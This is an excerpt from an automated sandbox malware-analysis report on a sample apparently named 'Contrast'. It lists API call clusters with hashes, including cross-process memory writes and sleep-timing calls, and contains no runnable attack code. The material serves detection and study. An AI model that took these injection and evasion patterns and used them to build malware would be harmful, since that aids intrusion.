                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00511738
                                                                                                                                        • BeginPath.GDI32(?), ref: 0051174F
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00511778
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                        • Opcode ID: 80d3a9addd47139c6a7ce84a79e7d32d0ed3f8cf2a64e0e1107fb97c5d02d7ab
                                                                                                                                        • Instruction ID: 95b0195aad7efaa411ff549a769d3646ba44e3b81dd63b8bfec992c668a34eb8
                                                                                                                                        • Opcode Fuzzy Hash: 80d3a9addd47139c6a7ce84a79e7d32d0ed3f8cf2a64e0e1107fb97c5d02d7ab
                                                                                                                                        • Instruction Fuzzy Hash: 17219230806608EBEB209F64DC4C7AD7FA8F724311F144297F915A62E0E7719899FB98
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                        • Opcode ID: 8bf5390f2e4e3a1cfe1a0ef29dd873057c60f66df7394d53938bb85ea08aa7ae
                                                                                                                                        • Instruction ID: fef273674e6d0bc1374a59ff5d62b38ad4cbf557cbf02ea975611403ce4e58b6
                                                                                                                                        • Opcode Fuzzy Hash: 8bf5390f2e4e3a1cfe1a0ef29dd873057c60f66df7394d53938bb85ea08aa7ae
                                                                                                                                        • Instruction Fuzzy Hash: 1F01F563A005063BD22066629D97FBB7F1CBE61398F048025FE0697741E760DE1182F4
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00575075
                                                                                                                                        • __beginthreadex.LIBCMT ref: 00575093
                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 005750A8
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005750BE
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005750C5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3824534824-0
                                                                                                                                        • Opcode ID: 3a227d461e0871f95e0535bbdcc388066c9f898a1f6b7fb2321f5d647cb6296f
                                                                                                                                        • Instruction ID: 0d559adba47ebb263c80a6b77cc9638d91edd853c75f858b4763d48a5abaeaeb
                                                                                                                                        • Opcode Fuzzy Hash: 3a227d461e0871f95e0535bbdcc388066c9f898a1f6b7fb2321f5d647cb6296f
                                                                                                                                        • Instruction Fuzzy Hash: 2411E576909758BBC7119BA8AC08ADB7FACBB56321F144257F818D3290E6B18D0897E0
                                                                                                                                        APIs
                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568E3C
                                                                                                                                        • GetLastError.KERNEL32(?,00568900,?,?,?), ref: 00568E46
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00568900,?,?,?), ref: 00568E55
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00568900,?,?,?), ref: 00568E5C
                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568E73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                        • Opcode ID: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                                                                                                                                        • Instruction ID: a04a29d4288f8f7219c553c4fa6fc91ba8526b4ec9c1e5f2688d24ff29857676
                                                                                                                                        • Opcode Fuzzy Hash: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                                                                                                                                        • Instruction Fuzzy Hash: 3E0181B0251204BFDB205FA5DC48DBB7FADFF9A354B100629F849C3260DB329C14DA60
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0057581B
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00575829
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575831
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0057583B
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575877
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 8f7dbf67c52bd68034b168c311cf71d4eab958844da5227bdd5a81c15106354c
• Instruction ID: ca8e10562e50acf95972500763604b9bf7ed1b9c13e0245552752a25dc8e2843
• Opcode Fuzzy Hash: 8f7dbf67c52bd68034b168c311cf71d4eab958844da5227bdd5a81c15106354c
• Instruction Fuzzy Hash: DB015731D11A19DBDF00AFE4EC48AEDBFB8BB19711F108956E405B2180EB709954EBA2
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?,?,00568073), ref: 00567D45
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D60
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D6E
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?), ref: 00567D7E
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D8A
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
• Instruction ID: d1c642ee8ac08349d29f9174f6da10e6511f8d30c277056c4707583f9b7a3a05
• Opcode Fuzzy Hash: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
• Instruction Fuzzy Hash: DC019A72611219ABCB108F24DC04BAA7FBDEF48756F104424F809D7210E735ED00ABA0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568CDE
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568CE8
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568CF7
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568CFE
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568D14
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
• Instruction ID: 71d6b6a62de33427f44d27fa994fe2d24f294a2aee9fa83bd27eba6a0248188c
• Opcode Fuzzy Hash: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
• Instruction Fuzzy Hash: E6F03C35210204AFEB210FA59C8DEB73BADFF5A754F504525FA4586190CB61EC45EB70
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568D3F
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00568D49
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D58
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D5F
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D75
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
• Instruction ID: 6e0759d4b5755a6cc5607c5c8808821c779f594d82e1fb02c3925d82eb323524
• Opcode Fuzzy Hash: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
• Instruction Fuzzy Hash: 2CF06970210204AFEB110FA5AC88EB73BACFF5A758F440215F94483190CBA09904EA60
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0056CD90
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0056CDA7
• MessageBeep.USER32(00000000), ref: 0056CDBF
• KillTimer.USER32(?,0000040A), ref: 0056CDDB
• EndDialog.USER32(?,00000001), ref: 0056CDF5
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: e41943235cbe70344d3022e70664609c8fe04190c873e4d54bceaf02af5be3fc
• Instruction ID: 543cbd76e5c7af99b8035d8fe05d9f0081b9d3d28d4df415bbf7df7fc86f3f92
• Opcode Fuzzy Hash: e41943235cbe70344d3022e70664609c8fe04190c873e4d54bceaf02af5be3fc
• Instruction Fuzzy Hash: 28016D30550748ABEB215F60DD8EBA67FB8FB11705F040669A5D2A20E1DBF0A9589A80
APIs
• EndPath.GDI32(?), ref: 0051179B
• StrokeAndFillPath.GDI32(?,?,0054BBC9,00000000,?), ref: 005117B7
• SelectObject.GDI32(?,00000000), ref: 005117CA
• DeleteObject.GDI32 ref: 005117DD
• StrokePath.GDI32(?), ref: 005117F8
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: e740b78ec6b09140b86a4052d2afab11d6f31c6d1e594708ce4479c8a84c1be9
• Instruction ID: c924c174c18ac2309b0be62a83483ae28d5e0099b8e0e65643b1dcc00dc17396
• Opcode Fuzzy Hash: e740b78ec6b09140b86a4052d2afab11d6f31c6d1e594708ce4479c8a84c1be9
• Instruction Fuzzy Hash: CAF0193000960DABEB215F25ED4C79D3FA4F725322F048256E529542F0E735499AFF18
APIs
• CoInitialize.OLE32(00000000), ref: 0057CA75
• CoCreateInstance.OLE32(005A3D3C,00000000,00000001,005A3BAC,?), ref: 0057CA8D
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
• CoUninitialize.OLE32 ref: 0057CCFA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
• Opcode ID: 380e9a9cf51c408173af456b8b24c197db5c0fe3c739b4ed30d0cefa3fe74932
• Instruction ID: 50513901d9f07feaba4414e59cee46a6d24d4f71852455546a4317a8d045257b
• Opcode Fuzzy Hash: 380e9a9cf51c408173af456b8b24c197db5c0fe3c739b4ed30d0cefa3fe74932
• Instruction Fuzzy Hash: AFA13CB1104206AFE300EF64D895EABBBE8FF95754F00491CF15597292EB70EE49CB92
APIs
  • Part of subcall function 00530FE6: std::exception::exception.LIBCMT ref: 0053101C
  • Part of subcall function 00530FE6: __CxxThrowException@8.LIBCMT ref: 00531031
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
  • Part of subcall function 00521680: _memmove.LIBCMT ref: 005216DB
• __swprintf.LIBCMT ref: 0051E598
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0051E431
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 1943609520-557222456
• Opcode ID: cff071b09dc7e6ef72903d46e34ed2d66e288b372c8b02b78313518794961721
• Instruction ID: 9a0190ec709a744d876f9079d85e8b09ee50e670792ffb8c92726499759f3e70
• Opcode Fuzzy Hash: cff071b09dc7e6ef72903d46e34ed2d66e288b372c8b02b78313518794961721
• Instruction Fuzzy Hash: F09170715046529FD714EF24D8AAC6FBFA5FFD6300F40091DF846972A1EA20EE48CB96
APIs
• __startOneArgErrorHandling.LIBCMT ref: 005352CD
  • Part of subcall function 00540320: __87except.LIBCMT ref: 0054035B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: c3a3e59eaace9d82e0dfe074c95bcf91dc51a01db8378ffabd81fff398958d4d
• Instruction ID: d52bbd22d64735c12b602666bc935fe3f6ab2cd64078aca8f67387d0e32b58cf
• Opcode Fuzzy Hash: c3a3e59eaace9d82e0dfe074c95bcf91dc51a01db8378ffabd81fff398958d4d
• Instruction Fuzzy Hash: 6F516A35A09A0297CF117B14C9553BA7FA0BB40764F307D69F6C18A2E5FE348CC8AA42
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID:
• String ID: #$+
• API String ID: 0-2552117581
• Opcode ID: 1c48d25ff6643b3081f2e0f26d2e0bd44c0c668136d1c71405f69a357f33f305
• Instruction ID: fdb099d6a5dcc5edda17913ff1cd42e270c6b7b94d4fd4957c2e83d5c9c50fdc
• Opcode Fuzzy Hash: 1c48d25ff6643b3081f2e0f26d2e0bd44c0c668136d1c71405f69a357f33f305
• Instruction Fuzzy Hash: A351E075500256CFDF25EF68C894AFA7FA4FF66320F144055E892AB2D0D734AD82CBA0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memmove$_free
• String ID: #VR
• API String ID: 2620147621-2899241889
• Opcode ID: 1ce7bf3d35307742a5da6c5af42e80f1e48a31795c1399479820cfdde06eb99c
• Instruction ID: 64268e024ab84b0d07b89c77c292db44af0774d0d1c89233ba01e827cb692747
• Opcode Fuzzy Hash: 1ce7bf3d35307742a5da6c5af42e80f1e48a31795c1399479820cfdde06eb99c
• Instruction Fuzzy Hash: 615149716087428FEB24CF28C495B6FBBE1FF85314F14492DE98A87291E731E885CB52
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
• Opcode ID: a575c1835de0d02c6d7d6e04905b3f63be0fee8154c53a90bbbbbbabe1448c2e
• Instruction ID: ab2ec382ee7b265e8f49d1ed1deb63b30ad548f6adb9576e2b80b56a998820bf
• Opcode Fuzzy Hash: a575c1835de0d02c6d7d6e04905b3f63be0fee8154c53a90bbbbbbabe1448c2e
• Instruction Fuzzy Hash: 1D51E1B190071A9FDB24CF65D888BAABFF4FF45310F24856EE94ACB291E7309581CB50
APIs
  • Part of subcall function 00571CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569E4E,?,?,00000034,00000800,?,00000034), ref: 00571CE5
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0056A3F7
  • Part of subcall function 00571C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00571CB0
  • Part of subcall function 00571BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00571C08
  • Part of subcall function 00571BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00569E12,00000034,?,?,00001004,00000000,00000000), ref: 00571C18
  • Part of subcall function 00571BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00569E12,00000034,?,?,00001004,00000000,00000000), ref: 00571C2E
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A464
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A4B1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 756dcdb471d28559ed50c56d32b58a3d51b4cfda8c482b7877e06fe64b19d760
• Instruction ID: 068a5ef56c6e3eb320c304e1a96ff2ff147958e98d1946c80aebc4df26cf6f65
• Opcode Fuzzy Hash: 756dcdb471d28559ed50c56d32b58a3d51b4cfda8c482b7877e06fe64b19d760
• Instruction Fuzzy Hash: C9413C7290021DAFDF11DBA4DD85ADEBBB8FF45300F004095FA55B7181DA706E49DBA1
